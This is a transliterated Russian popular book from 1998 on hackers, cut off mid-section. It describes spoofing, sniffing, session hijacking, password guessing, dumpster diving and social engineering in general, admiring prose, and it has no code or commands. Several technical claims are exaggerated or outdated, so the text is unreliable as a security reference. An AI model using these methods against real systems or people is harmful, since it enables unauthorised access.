Ocenite etot tekst:


---------------------------------------------------------------
 © Copyright Boris Leont'ev
 Home page:  http://members.rotfl.com/bobleon/
 Email: bobleon@uniinc.msk.ru
---------------------------------------------------------------

     BBK 32.973
     UDK 681.3
     Glavnyj redaktor
     Dmitrij Carik
     Korrektor
     Irina Carik
     Hudozhnik-dizajner
     Boris Leont'ev
     Leont'ev B.
     L80   Hakery,   vzlomshchiki  i   drugie  informacionnye  ubijcy.  --  M.:
Poznavatel'naya kniga, 1998. -- 192 s.
     ISBN 5-88548-067-2
     Ochevidno,  chto smysl Seti setej sostoit v  razumnosti ogranicheniya kruga
pol'zovatelej  togo  ili  inogo  servera.  Esli  podobnyj  server  zakuporen
polnost'yu, to i rabotat'  mozhet  s nim lish' tot, kto ego zakuporil. Poetomu,
lyubaya  kompaniya,  prezhde  chem  prinyat'  reshenie o  vstuplenii  v  soobshchestvo
Internet, daet sebe otchet  v tom, chto sushchestvuet vozmozhnost' proniknoveniya v
svoj  glavnyj  server nekih  postoronnih lic.  Vot eti  postoronnie  lica  i
nazyvayutsya hakerami...
     Copyright © Boris Leont'ev, 1998.
     Copyright © Izdatel'stvo "Poznavatel'naya kniga plyus", 1998.
     Copyright © Design Studio M&C, 1998. Oformlenie serii i etoj knigi.
     Copyright  ©  Izdatel'stvo  "Utro" sovmestno s  firmoj "Oleg i  Pavel",
1998.
     Avtorskie prava  na  nastoyashchuyu knigu, nazvanie serii "Kratko, dostupno,
prosto" i  oformlenie samoj serii  prinadlezhat Borisu Leont'evu.  Polnoe ili
chastichnoe kopirovanie knigi, a  takzhe publikaciya  drugih rukopisej  v ramkah
etoj  serii bez  razresheniya pravoobladatelya yavlyaetsya  narusheniem  avtorskogo
prava  i mozhet imet' yuridicheskie  posledstviya  v sootvetstvii s  dejstvuyushchim
zakonodatel'stvom.
     Vsya   informaciya,   opublikovannaya   v  etoj   knige   predstavlena   v
isklyuchitel'no obrazovatel'nyh  celyah, a  takzhe  dlya  povysheniya  kvalifikacii
programmistov,  sistemnyh  administratorov  i  provajderov  Internet.  Avtor
preduprezhdaet chitatelej etoj knigi, chto  on ne neset nikakoj otvetstvennosti
za  te   posledstviya,  kotorye  mogut  vozniknut'  v  rezul'tate  provedeniya
eksperimentov s predostavlennoj informaciej.
     Vse nazvaniya produktov,  upomyanutye v  etoj  knige, yavlyayutsya  tovarnymi
znakami    ili   zaregistrirovannymi   tovarnymi   znakami   sootvetstvuyushchih
organizacij.
     Programmnoe   obespechenie,   opisannoe  v  etoj   knige,   postavlyaetsya
isklyuchitel'no   po  licenzionnomu   dogovoru  i  mozhet  ispol'zovat'sya   ili
kopirovat'sya  tol'ko v sootvetstvii  s usloviyami etogo dogovora. Kopirovanie
etogo  programmnogo obespecheniya na kakoj-libo nositel'  informacii,  esli na
eto  net  special'nogo  razresheniya  po   licenzionnomu  dogovoru,   yavlyaetsya
narusheniem Zakona Rossijskoj Federacii "O pravovoj ohrane programm dlya |VM i
baz dannyh" i norm mezhdunarodnogo prava.
     LR  No  069954  ot 01.12.1991  g. Sdano  v  nabor 06.07.98. Podpisano v
pechat' 06.09.98. Format 60X84/16.
     Bumaga tipografskaya. Garnitura "Newton". Pechat' ofsetnaya.  Fiz. pech. l.
12. Tirazh 5 000 ekz. Zakaz 48.
     Hacker's Manifest
     This is our world now... the world  of the electron and the switch, the
beauty of the baud.
     We make use of a service already existing without paying for what could
be dirt  cheep  if  it  wasn't run by profiteering gluttons, and you call us
criminals.  We explore...and  you call  us criminals. We  exist without skin
color,  without  nationality,  without  religious  bias...and  you  call  us
criminals. You build  atomic bombs, wage wars, murder, cheat,  and lie to us
and try to make us believe it is for our own good, yet we're the criminals.
     Yes,  I am  a criminal. My crime is that of curiosity. My crime is that
of judging people by what  they say and  think,  not what they look like. My
crime is that of  outsmarting you, something that you will  never forgive me
for. I am  a hacker and this is my manifesto.  You may stop this individual,
but you can't stop us all... after all, we're all alike.
     Kto takie hakery
     Ochevidno, chto smysl Seti setej  sostoit v razumnosti  ogranicheniya kruga
pol'zovatelej  togo  ili  inogo  servera.  Esli  podobnyj  server  zakuporen
polnost'yu,  to i rabotat' mozhet s nim lish'  tot, kto ego zakuporil. Poetomu,
lyubaya  kompaniya,  prezhde  chem  prinyat'  reshenie  o  vstuplenii v  soobshchestvo
Internet, daet sebe otchet  v tom, chto sushchestvuet vozmozhnost' proniknoveniya v
svoj  glavnyj  server  nekih postoronnih  lic.  Vot  eti  postoronnie lica i
nazyvayutsya hakerami.
     Da, hakery -- eto te, kto vzlamyvayut seti.
     Delaetsya eto raznymi sposobami. Naprimer, cherez port terminala ili port
elektronnoj pochty.
     Vybrav  zhertvu,  haker prezhde  vsego opredelyaet, imeyutsya li na  servere
plohie  paroli,  ploho  nastroennyj soft ili isporchennaya operacionka.  Zatem
vybiraetsya  metod  sobstvennoj  bezopasnosti. Samyj  rasprostranennyj sposob
proniknut' v set' tak, chtoby ostat'sya nezamechennym -- eto vzlom po cepochke.
     Sushchestvuyut tonny programm, posredstvom  kotoryh  komp'yuter mozhet  vesti
poisk  parolya  cherez perebor  nekotorogo slovarya imen. Slozhnee vskryt' set',
esli parol' logina imeet bol'she shesti simvolov, chuvstvitelen  k registru ili
soderzhit cifry.
     No!  V  nastoyashchee vremya  mnogie  seti  otkryvayut  k  sebe dostup  cherez
avtomaticheskoe  prohozhdenie  sistemy parolej. |ta sistema  postroena  na tak
nazyvaemom fajle parolej. V etom fajle perechislyayutsya dostupnye komp'yutery  i
paroli seti. CHto delaet haker? On  vlamyvaetsya v set' i skachivaet etot fajl.
Vse!
     Drugoj   sposob  vzloma   --  vzlom  cherez   otladochnye   pereklyuchateli
operacionnyh sistem.  Kak izvestno eti pereklyuchateli mogut inogda nahodit'sya
vo  vklyuchennom  sostoyanii.  Krome  vseh  etih  vysheperechislennyh  pribludov,
konechno zhe, shiroko ispol'zuetsya predvaritel'naya virusnaya ataka.
     Vzlomav set',  haker zametaet sledy  i  unichtozhaet vsyu komprometiruyushchuyu
sebya informaciyu. I cherez nekotoroe vremya smatyvaetsya.
     Lyuboj  kvalificirovannyj  haker  cherez  obyknovennyj  faks-modem  mozhet
proniknut' dazhe v  komp'yuter pravitel'stvennogo uchrezhdeniya  i,  pri zhelanii,
nastol'ko vnedrit'sya v  lyubuyu  kak  by to  ni bylo zashchishchennuyu  sistemu,  chto
prosto-naprosto  razrushit   ee.  Tak   ono  i  bylo.   Dostatochno  vspomnit'
zlopoluchnyj segment  Milnet seti setej i  vsem izvestnuyu  labu Rome VMS SSHA.
Da, eto byl nastoyashchij  koshmar,  kogda odin  iz etih  chudakov-hakerov  tvoril
bezobraziya v techenie nedeli na odnoj iz samyh sekretnyh voennyh baz Ameriki!
     Vskryt' set'  mozhno  i  s pomoshch'yu  obyknovennogo  faks-modema ili  dazhe
faks-apparata.  Ved'  v  lyuboj  dostatochno krupnoj kompanii faks podklyuchen k
LAN! A eto znachit, chto cherez nomer faksa  haker otkryvaet dostup k zavetnomu
shlyuzu. Lyuboj bolee ili menee ser'eznyj (ili dazhe neser'eznyj) haker Internet
orientiruetsya   na   lokal'nuyu   set'.  Emu   interesen   soft   zashchity   ot
nesankcionirovannogo dostupa. On spit novymi  versiyami  firewall. On smeetsya
pri  upominanii durackogo "brandmauer".  Sun! Sun! Sun! Na  mir  Robin-Gudov
nadvigaetsya sherifovskij  Sun!  Vse! Vse pogibli! Vse hakery stali sistemnymi
administratorami! Oni ispravilis'. Oni bol'she ne budut...
     Da-da,  sistemnye  administratory  utverzhdayut, chto imenno brandmauer  i
est'  to samoe  ustrojstvo, razmeshchennoe  mezhdu lokal'noj  set'yu  i Internet,
pozvolyayushchee  raznogo  roda pridurkam otstat' ot nashego  servera. Vot imenno,
chto tol'ko pridurkam. Nastoyashchim pridurkam! Licezreete paketiki dlya ostanovki
shpionskogo  trafika?  A  haker davno zavladel  vsemi funkciyami podtverzhdeniya
polnomochij!  Na samom  dele haker  mozhet sam  proverit' vhodnye  i  vyhodnye
dannye.
     Mnogie  sisady  boyatsya  proshchupyvaniya ih hakerami.  I  mnogie znayut, chto
zakuporka paketov UDP mozhet ostanovit' vskrytie.
     Pochemu?  Potomu  chto  srabotaet zashchita!  Da,  haker blokiruet pakety, a
poetomu lyubye vhody cherez TCP tak  zhe blokiruyutsya. No problema v tom, chto  v
razrabotke samyh umnyh brandmauerov uchastvuyut te samye hakery! A pochemu by i
net?  Pochemu by i  ne napisat'  kod  virusnoj  programmy, a potom  pridumat'
sootvetstvuyushchij   antivirus!   Mnogie   schitayut,  chto  vse-taki   sushchestvuet
vozmozhnost'  vyzvat'  mastera,  kotoryj  postavit  stal'nuyu  dver' s cvetnym
domofonom. I mnogie nadeyutsya na eti samye  brandmauery Internet.  |to daleko
ne tak.  Da, Firewalls sposobny izolirovat' lokal'nye  seti  ot  vskrytiya iz
Internet posredstvom  ekraniruyushchih marshrutizatorov,  dvustoronnih  shlyuzov  i
bar'ernoj host-mashiny. No! Problema v tom, chto eto  izvestno kazhdomu hakeru.
|kraniruyushchie  marshrutizatory?  Prekrasno!  Proverka  adresa  IP i  zakuporka
fal'shivogo  trafika?  A  kto govorit,  chto eto ne  tak?  Vse  verno! Kuporim
trafik.  A  kak naschet  Telnet i  username/password logon?!  Terminal Access
Controller Access System? Vklyuchajte! No eto stoit bol'shih deneg.
     Mnogie  kompanii  zashchishchayutsya   elektronnymi  kartochkami.   Poetomu   ih
vskryvayut men'she  drugih.  |to delo dejstvitel'no gramotno skonfigurirovano.
SecurID   Card  imeet  tol'ko  tot  yuzer,  kotoryj  imeet   pravo   dostupa!
Sootvetstvuyushchaya  prikladnuha  identificiruet istinnost' yuzera  cherez dvojnuyu
proverku scheta i personal'nyj kod.
     |to  vse,  dejstvitel'no, horosho,  za  isklyucheniem  teh  sluchaev, kogda
prostoj narod podaet v sud.  Ne proshche li, gospoda,  prosto  povesit' trubku?
Pust' vsegda budet zanyato? Ili net?
     A mnogie, radi eksperimenta, dopuskayut k svoim setyam hakerov. Rezul'tat
byvaet plachevnym. Hakery pronikayut v massu sekretnyh sistem, poluchayut polnyj
kontrol' i delayut tak, chto ih  nikto ne mozhet  obnaruzhit' v techenie  dolgogo
vremeni.
     Hakery  pol'zuyutsya  oshibkami softa. Oni  znayut, chto  sistema zarabotaet
sama po sebe  i  konfidencial'naya informaciya budet kachat'sya  tuda,  kuda  ej
neobhodimo  kachat'sya. Byvayut, konechno,  i "sluchajnye oshibki". A pochemu by  i
net?  Mogut  byt'  v   softe  takie  oshibki.  Prednamerennye...  Programmnye
zakladki,  programmnye  zakladki...  Hakery  ispol'zuyut ih  dlya teh ili inyh
operacij na udalennoj mashine. Da, dejstvitel'no, hakery ispol'zuyut eti samye
zakladki  v  svoih  mezhsetevyh mahinaciyah! I esli  vasha  sistema  est'  uzel
kommutacii  telekommunikacionnoj  seti, to  hakery mogut  raschlenit'  set' i
vospol'zovat'sya raschlenennym fajlom  parolej. Imenno takim obrazom na Veneru
ne poletel  kosmicheskij  korabl'!  Pochemu?  Da  potomu,  chto operator vmesto
zapyatoj  postavil tochku.  A  kak  naschet  100  000  dollarov,  kotorye  byli
pozaimstvovany   nekim  anonimnym  podlecom   vo  Vneshekonombanke  nerushimoj
respubliki svobodnoj?
     Hakery,  dejstvitel'no,  mogut svesti na  net  bezopasnost'  informacii
lyubogo  servera!  Kto zhe  oni  takie? Horoshie programmisty? Byvshie sistemnye
administratory?  Obyknovennye   studenty?  Nigilisty?  Oskorblennye   yuzery?
Vunderkindy iz komp'yuternoj shkoly?
     Metody hakinga: Spufing
     Izvestno,  chto  lyubaya  sistema zashchity  tipa  Firewall  pozvolyaet "zhit'"
tol'ko  opredelennym  adresam  IP.  |to  ves'ma  ser'eznoe  prepyatstvie  dlya
proniknoveniya  v  set'. Poetomu hakery  nashli metod  dlya  preodoleniya  etogo
bar'era - spufing IP. Snachala  haker vyyasnyaet, kakie iz adresov IP  prohodyat
cherez firewall, zatem ispol'zuet  odin  iz vychislennyh  adresov  v  kachestve
svoego  i  takim obrazom poluchaet dostup k sisteme. Vprochem,  eto  ne vsegda
tak.  Naprimer,  izvestnaya  sistema  zashchity  FireWall-1  dejstvitel'no  daet
vozmozhnost'   ustanovit'   prozrachnoe  podklyuchenie  k  Internet,   ispol'zuya
prakticheski ves' diapazon  protokolov  mezhsetevogo vzaimodejstviya, obespechiv
pri  etom  nekotoruyu (tol'ko v  tret'ej  versii etogo ekrana  byla  zalatana
dyrka,  sidevshaya  v  kodirovke  dannyh i identifikacii klienta-pol'zovatelya)
zashchitu seti. Mnogih administratorov, konechno, raduet intuitivnyj graficheskij
interfejs etoj sistemy, a hakerov pugaet  mnogoprotokol'naya proverka paketov
s tak  nazyvaemym  uchetom sostoyaniya protokola (SMLI), poetomu  oni starayutsya
prosto obhodit' seti s FireWall-1, ostaviv spuffing dlya drugoj sistemy.
     Mnogie   sistemnye  administratory  schitayut,  chto  vse-taki  sushchestvuet
vozmozhnost'  vyzvat'  mastera,  kotoryj  postavit stal'nuyu  dver'  s cvetnym
domofonom. I mnogie, konechno, nadeyutsya na eti samye brandmauery Internet.
     Pozvolyu sebe  zametit', chto eto daleko  ne  tak. Da, Firewalls sposobny
izolirovat' lokal'nye seti ot vskrytiya  iz Internet posredstvom ekraniruyushchih
marshrutizatorov, dvustoronnih shlyuzov i bar'ernoj host-mashiny. No! Problema v
tom,   chto  eto  izvestno  kazhdomu   hakeru.  |kraniruyushchie   marshrutizatory?
Prekrasno! Proverka adresa IP i zakuporka fal'shivogo trafika? A kto govorit,
chto  eto  ne  tak?  Vse  verno!  Kuporim  trafik.  A  kak  naschet  Telnet  i
username/password  logon?!   Terminal   Access  Controller  Access   System?
Vklyuchajte!
     Metody hakinga: Sniffing
     Set' TCP/IP -- eto okolo 150 dyrok, skvoz' kotorye otkryvaetsya dostup v
sistemu (TCP/IP  -- protokol, cherez  kotoryj  ustanavlivaetsya  isklyuchitel'no
oboyudnoe postoyannoe soedinenie). |to tak i eshche raz  tak. I  v pervuyu ochered'
potomu, chto lyuboj, kto registriruetsya  v seti TCP/IP (cherez telnet ili  ftp)
posylaet  dannye o  svoem  parole  v obyknovennom  IP-pakete. Poetomu, chtoby
poluchit' parol' i  login, dostatochno vysledit' podobnyj paket, prihodyashchij na
izvestnyj adres,  to est' zahvatit' trafik. Dalee u  hakera budet vybor.  On
mozhet poluchit' rekvizity chajnika. Togda dostup v sistemu budet ogranichennym.
No esli on poluchit parol' sistemnogo administratora, to smozhet skachat'  fajl
parolej vseh pol'zovatelej sistemy.
     Sniffing - odin  iz samyh  populyarnyh metodov  vorovstva dannyh v  seti
(parolej,  imen  pol'zovatelej,  klyuchej  i  t.d.)  posredstvom  special'nogo
programmnogo obespecheniya (tak nazyvaemyh snifferov).  Sniffery, kak pravilo,
dostupny lish' sistemnym  administratoram, tak kak eti sistemy ves'ma dorogie
i  ne po karmanu dazhe samomu krutomu hakeru.  Esli  sniffer popadaet v  ruki
hekera, to on smozhet ves'ma effektivno kontrolirovat'  set', zahvativ parol'
i identifikacionnoe imya sistemnogo administratora.
     Ataka  posredstvom sniffinga ne predusmatrivaet  sozdanie  sobstvennogo
fal'shivogo adresa IP dlya obmana fil'truyushchej sistemy adresov. I v samom dele,
zachem  nuzhen  fal'shivyj  IP,  esli zamedlyaetsya tol'ko skorost'  vhodyashchego  v
sistemu  potoka  informacii.  |to oznachaet, chto vse mozhno spisat'  na plohoe
kachestvo svyazi.
     Lider sredi vseh snifferskih liderov -- eto paket IP-Watcher 1.0:
     n vyborochnoe otslezhivanie paketov IP.
     n zahvat aktivnogo soedineniya.
     n zakuporka setevyh soedinenij.
     n zakreplenie na udalennoj sisteme.
     n preryvanie aktivnogo soedineniya TCP.
     n sovmestnoe ispol'zovanie neskol'kih
     soedinenij.
     n nevozmozhnost' identifikacii
     n administrativnym monitoringom.
     Samyj  smak  paketa  IP-Watcher  zaklyuchaetsya  v  tom,  chto  haker mozhet
prodlit' zhizn'  soedineniyu posle ego  razryva  pol'zovatelem. Haker zagonyaet
pol'zovatelya  v  lovushku. Snachala on zahvatyvaet  trafik. Zatem  rvet svyaz'.
ZHdet. Pol'zovatel' opyat' vhodit  v sistemu i registriruetsya. Parol' u hakera
v karmane.
     Vyborochnoe otslezhivanie paketov  IP  pozvolyaet, naprimer, perehvatyvat'
tol'ko  identifikacionnye dannye ili fajly lyubogo komp'yutera,  prinadlezhashchie
serveru.
     Metody hakinga: Musornye bachki
     Hakery chasto issleduyut musornye bachki krupnyh kompanij i inogda nahodyat
scheta za  telefonnye  peregovory, vnutrennie  telefony  kompanii,  razlichnye
tehnicheskie rukovodstva, nomera kreditnyh kartochek i t.d.
     Metody hakinga: Lovlya na durachka
     Kazhdyj  horoshij  haker  obladaet  prevoshodnymi  navykami  v  iskusstve
pudrit'   mozgi.  Naprimer,  haker  mozhet  zaruchit'sya   doveriem  sistemnogo
administratora  s  tem,  chtoby   poluchit'  dostup   k  sekretnoj  informacii
posredstvom prostogo telefonnogo razgovora, v  kotorom on  predstavit sebya v
kachestve kakogo-nibud' tehnika-smotritelya.
     Metody hakinga: Vzlom parolej
     Samyj prostoj put' - intuiciya hakera  (nazvaniya pesen, imena  akterov).
Bolee  slozhnyj  - cherez  special'nuyu programmu,  kotoraya  avtomaticheski ishchet
parol' s pomoshch'yu slovarya.
     U hakerov imeetsya  ogromnoe  kolichestvo metodov dlya vyyasneniya parolej i
polucheniya  dostupa k  setyam. |ti metody  var'iruyutsya ot  prostyh  (zapis'  v
otdel'nyj log-fajl  nazhatij  klaviatury) do izyskanno slozhnyh  (deshifrovanie
ogromnyh baz dannyh).
     Koshmarnye nochi sistemnyh administratorov
     Sysad ne spit. On na rabote. On ne mozhet spat'. A emu tak hochetsya...
     Nuzhno skazat',  chto v  osnovnoj  svoej  masse  sistemnye  operatory  --
zakorenelye   nedalekie  pol'zovateli.   Imenno   iz-za  nih   i  proishodit
bol'shinstvo vzlomov.  Net,  ne  iz-za ih nekommpetentnosti, a  skoree  iz-za
hamskogo  povedeniya  etih setepodobnyh  lichnostej. Sisasady terpet' ne mogut
pridurkovatost' obyknovennyh yuzerov. Oni ih schitayut nedouchkami. A esli sredi
etih nedouchek popalsya haker!? Pust' poprobuyut? Vot lyudi i probuyut. Probuyut i
u nih  poluchaetsya! Sisad smotrit na  displej.  Rabotaet  sisad. A  mashina-to
tormozit. Pochemu eto ona tormozit? Net,  ne ponyat' eto  emu. A  gde  zhe etot
fajl? A  eto, chto za papka? Pochemu  etot fajl stal  bol'she na  sto kilobajt!
Bozhe, kakoj ya durak! Menya vskryli! Ma-a-a-a-a-ma!
     Net,  sisad ne teryaetsya.  Sisad  umnyj.  Sisad  bystro  proveryaet  fajl
parolej.  Fajl parolej! O,  maj god! Ego skopirovali!  Vot  on etot strannyj
vhod. YA  nashel!  YA zhe govoril,  chto nel'zya delat' stol'ko privilegij! Vse, ya
pogib... poshla virusnaya ataka.
     I  ne pomnit sisad, chto nakanune ves'ma grubo otvechal  kakomu-to duraku
po  obyknovennomu  vojsovomu  telefonu.  A etot kto-to i okazalsya tem  samym
podlym vzlomshchikom. He-he.
     Dostup k Internet, Windows 95 i
     Russian Online
     Itak,  u  vas imeyutsya  modemnyj  nomer dostupa  (258-4120),  imya domena
(online.ru), subnet mask (255.255.255.0), pervyj adres DNS  (194.67.1.154) i
vtoroj adres DNS (194.67.1.155).
     Poehali nastraivat' Windows. Nazhimaem Network. Vybiraem  Configuration.
Udostoveryaemsya,   chto  prisutstvuyut   Dial-up  Adapter  i   TCP/IP.   Dalee,
konfiguriruem   TCP/IP    Dynamic   IP    Address.    Teper'   konfiguriruem
sootvetstvuyushchij  drajver dlya Windows 95.  V papke Control Panel  shchelkaem  na
Network, dalee na TCP/IP Protocol  i  Properties. V poyavivshemsya dialoge v IP
Address  vybiraem Obtain an IP Address automatically  option, v konfiguracii
WINS vybiraem Disable WINS Resolution (kompaniya vseh provajderskih  kompanij
Sovam Teleport ne obyazyvaet  vvodit' IP-vhodnoj nomer).  Ishodya iz poslednih
skobok Client Microsoft  Networks  ostavlyaem bez  izmenenij, a  v punkte DNS
Configuration vybiraem opciyu Enable DNS.
     Teper'  vvodim  sobstvennyj localname  v  pole Host, a  v  pole  Domain
vpisyvaem  domenovskoe prostoe i ponyatoe online.ru. V pole DNS Server Search
Order vpisyvaem dogovornyj IP adres servera (194.67.1.154) i nazhimaem knopku
Add. Pole Domain Suffix Search Order ostavlyaem bez izmenenij.
     Nakonec, nazhimaem  knopku OK, perezagruzhaemsya,  vnov' vhodim v  Windows
95, otkryvaem My Computer i shchelkaem na ikonke Dial-up Networking. V Make New
Connection  vpisyvaem lyuboe nazvanie ikonki. Nazhimaem Configure, popadaem  v
dialog General i stavim skorost' raboty v seti.
     Dal'nejshie dejstviya dolzhny byt' vam ponyatny. Pomnite, chto v Server Type
v pole Type of Dail-up  Server  vy dolzhny vybrat' RRR. Pri etom opciya Log on
to network  v  Advanced Options  dolzhna  ostat'sya neaktivizirovannoj!  Krome
vsego etogo dolbannogo breda obratite  vnimanie  na  opciyu TCP/IP v  Allowed
network protocols. |ta chudnaya opciya dolzhna byt' otmechena.
     Dalee,  konfiguriruem  modem dlya avtomaticheskogo  nabora v sluchae, esli
liniya  zanyata.  Iz  Dial-up Networking  folder  vybiraem  Connections, zatem
Settings i, nakonec, neobhodimoe kolichestvo soedinenij.
     Teper' shchelkaem na sozdannoj piktogramme,  vhodim v  Connect to i vvodim
UserID  v  chudakovato-pridurkovom formate  UserID@online.ru.  Vvodim parol',
nazhimaem  Connect,  vhodim v sistemu,  tykaem  na  F7  i,  ignoriruya  dialog
Connected to Dial-up PPP, popadaem v do boli znakomuyu Set'.
     Kak stat' hakerom
     Dal'she idut shutochki shutochek.
     Stat' hakerom ochen' prosto.
     Dostatochno vyuchit' i ponyat': matematicheskie discipliny  (matematicheskij
analiz, teoriyu funkcij  kompleksnogo peremennogo, algebru, geometriyu, teoriyu
veroyatnostej, matematicheskuyu statistiku, matematicheskuyu  logiku i diskretnuyu
matematiku),    inzhenernye   discipliny    (fiziku,   apparatnye    sredstva
vychislitel'noj  tehniki,  osnovy  radioelektroniki,  seti  svyazi   i  zashchitu
informacii  ot  tehnicheskoj  razvedki),  discipliny  po  programmirovaniyu  i
vychislitel'noj tehnike (informatiku, yazyki programmirovaniya vysokogo urovnya,
metody  programmirovaniya,  yazyk  assemblera, operacionnye  sistemy,  sistemy
upravleniya  bazami  dannyh i  vychislitel'nye  seti), special'nye  discipliny
(kriptografiyu i teoreticheskie osnovy zashchity komp'yuternyh sistem).
     |to dostatochno  polnyj  spisok. No  esli zhe  govorit' o bolee podrobnyh
hakerskih veshchah, to vam neobhodimo znat', chto na svete sushchestvuyut:
     n kriptograficheskie metody v sistemah
     zashchity gosudarstvennoj,
     konfidencial'noj i kommercheskoj
     informacii.
     n kriptograficheskie metody i sredstva
     zashchity i deshifrovaniya informacii.
     n matematicheskie metody rascheta
     nadezhnosti shifrsistem.
     n matematicheskie modeli processov,
     voznikayushchie pri zashchite informacii.
     n metody resheniya veroyatnostnyh,
     statisticheskih i algoritmicheskih zadach
     kriptograficheskogo analiza, sinteza
     shifrsistem i kriptograficheskih
     protokolov.
     n metody opredeleniya ugroz bezopasnosti
     informacii.
     n metody postroeniya matematicheskih
     modelej zashchishchaemoj informacii,
     shifrov i shifrsistem.
     n metody preobrazovaniya informacii
     v setyah razlichnogo tipa.
     n metody prognozirovaniya ocenok
     kriptograficheskoj stojkosti.
     n obespechenie nadezhnosti
     funkcionirovaniya apparatury
     shifrovaniya i testirovaniya
     programmno-apparatnyh realizacij
     kriptograficheskih algoritmov.
     n obshchaya metodologiya kriptograficheskogo
     analiza i postroeniya ocenok
     kriptograficheskoj stojkosti
     shifrsistem.
     n opredelenie kanalov utechki informacii
     metodikoj izmereniya i rascheta
     parametrov opasnyh signalov.
     n osnovnye polozheniya teorii
     elektricheskih cepej.
     n osnovnye principy organizacii sistem
     i setej svyazi i osobennosti
     sovremennyh setevyh arhitektur.
     n osnovnye tipy shifrov, shifrsistem,
     kriptograficheskih protokolov i
     sposoby vybora sistemy zashchity.
     n osobennosti razrabotki i soprovozhdeniya
     programmnogo obespecheniya dlya rabochih
     grupp i paraprogrammirovaniya.
     n principy postroeniya shifrov,
     shifrsistem i kriptograficheskih
     protokolov.
     n tipovye metody kriptograficheskogo
     analiza i ocenivaniya
     kriptograficheskoj stojkosti.
     Haker ili vzlomshchik?
     Mnogie  dumayut,  chto  smysl  sushchestvovaniya  hakerov  sostoit  v  travle
neschastnyh  yuzerov Internet. Imenno  k  takim tipam,  navernoe,  i otnositsya
Klifford  Stoll,  vysledivshij  chudakov  iz  Germanii, prodavavshih  sekretnuyu
komp'yuternuyu informaciyu kommunistam. Navernoe, on prav. A vot Robert Morris,
avtor znamenitogo chervyaka-razrushitelya, schitaet, navernoe, po drugomu.
     CHto zhe mozhet sdelat' prostoj haker? Haker ili vzlomshchik? A est' li mezhdu
nimi  raznica? Est' mnenie, chto mnogie virusniki kak raz i pishut antivirusy.
Znachit, est'  i hakery-vzlomshchiki ili,  net -- vzlomshchiki-hakery. Vprochem, vse
ravno informacionnye ubijcy. Kak zhe  eti ubijcy uznayut paroli,  vtorgayutsya v
Internet i zarazhayut programmy na urovne protokola peredachi fajlov?
     Ispol'zuya osobyj soft, kotoryj vy mozhete skachat' iz Internet, vy mozhete
sami stat' hakerom. Naberite v Yahoo shizofrenicheskoe "crack"...
     Vzlom seti
     Vozmozhen,  naprimer,  s pomoshch'yu  Internet.  Dostatochno  pohitit' parol'
cherez  udalennyj dostup po protokolam FTP ili Telnet. V etom sluchae u hakera
imeetsya vozmozhnost'  perehvatit'  trafik  i  s  pomoshch'yu  kakoj-nibud' ishchejki
pojmat'  identifikatory pol'zovatelej,  a esli  povezet, to i  tonny parolej
togo ili  inogo uzla. Zadacha hakera --  poluchit' parol' vysokogo  urovnya, to
est' parol' supervizora, i uzhe  s pomoshch'yu  etoj informacii  zahvatit' paroli
vseh ostal'nyh yuzerov uzla.
     Haker mozhet vojti v set' v  kachestve udalennogo pol'zovatelya pod  vidom
proverki elektronnogo pochtovogo yashchika. Kak pravilo,  paroli dlya  elektronnoj
pochty ves'ma prostye, i inogda poddayutsya rasshifrovke s pervoj popytki.
     Hakery-profi primenyayut bolee  dejstvennye metody  vzloma. Rech' idet  ob
ugone   soedineniya   TCP.   Shema   prosta.   Kak   tol'ko   real'nyj   yuzer
identificiruetsya uzlom,  haker  pereklyuchaet soedinenie na sebya i  peredaet v
ciklicheskom  rezhime  po  TCP   ryad  cifr  do  teh  por,  poka  ne   poluchaet
posledovatel'nost'  nomerov, cherez  kotoruyu  mozhno podojti k seredine seansa
svyazi,  a zatem otkonnektit' yuzera. To  est', haker ne  tratit  zrya vremya na
lomku ves'ma slozhnoj sistemy shifrovaniya ili raskodirovku seansa registracii.
Net! Haker ugonyaet ves' seans registracii.
     Haker  mozhet  takzhe vospol'zovat'sya oshibkami  programmnogo  obespecheniya
vybrannogo uzla. Oshibki kodov softa,  obsluzhivayushchego udalennyh yuzerov -- eto
bezzashchitnye   dyrki.   Naprimer,    znamenityj   Netscape   Navigator    bez
konfigurirovaniya zashchitnyh  parametrov  ili  piratskaya programma  dlya  chteniya
elektronnyh soobshchenij, ili scenarii  (o  nih chitajte nizhe)  CGI so svobodnym
vhodom.
     Voz'mem,  naprimer, znamenituyu Microsoft  i ee  detishche  Windows. Mnogie
primenyayut  stek  TCP/UP  etoj  sistemy.  Kazhdomu  zhe  hakeru  izvestno,  chto
dinamicheskaya biblioteka  dannyh, otvechayushchaya  za  etot stek, napisana,  myagko
govorya, nekorrektno, to est', pri bol'shom  zhelanii haker mozhet po lyubomu  iz
protokolov  semejstva  TCP/IP  poluchit'  dostup  k   soderzhimomu  vinchestera
vybrannogo hosta.
     Dejstviya sistemnogo administratora na hakerskie pribambasy
     n unichtozhenie podozritel'nyh ekauntov.
     n monitoring sistemy.
     n chtenie chuzhoj elektronnoj
     korrespondencii.
     n otklyuchenie ARP.
     n postroenie seti bez NFS.
     n ispol'zovanie mashiny bez NetBIOS
     nad TCP/IP.
     SHlyuzovoj interfejs CGI-BIN
     V   podavlyayushchem   chisle   udalennyh    komp'yuterov   katalog    CGI-BIN
zarezervirovan dlya  ispolnyaemyh fajlov.  |to  oznachaet,  chto fajly  iz etogo
kataloga  mogut  byt' zapushcheny  cherez Web.  Obychno v etom kataloge  hranyatsya
scenarii na yazyke PERL, kotorye zapuskayutsya na udalennom servere
     Web-programmoj  CGI  (vy   prosto  nazhimaete  knopku  Submit,   kotoraya
sformirovana kodom formy HTML, napisannym dlya ispolnyaemoj  programmy CGI). V
etot  katalog, pri bol'shom zhelanii, mozhno pomestit' i drugie fajly,  imeyushchie
takoe  zhe otnoshenie  k  obshchemu  shlyuzovomu  interfejsu, kak  i  Bill  Gejts k
sozdaniyu UNIX.
     Gipertekstovyj yazyk predostavlyaet tol'ko informaciyu dlya chteniya, to est'
modificirovat'  Web-stranicy  mozhet  lish'  ih  avtor.  No!  Ispol'zuya  obshchij
shlyuzovoj  interfejs   CGI,  mozhno  dobavlyat'  nekotorye   operatory  HTML  v
sgenerirovannuyu stranicu. |to oznachaet, chto vy mozhete zaprosit' informaciyu u
Web-servera, zatem zapustit' poiskovyj soft i poluchit' to, chto vy hotite. Vy
prosto vstavlyaete nuzhnye  vam operatory gipertekstovogo yazyka v sushchestvuyushchuyu
Web-stranicu. Vasha zadacha -- najti Web-server, kotoryj  ispol'zuet CGI i tem
samym sposobnyj zapuskat' razlichnyj soft.
     Fajly obshcheshlyuzovogo  interfejsa -- eto ne obyknovennye  tekstoviki, eto
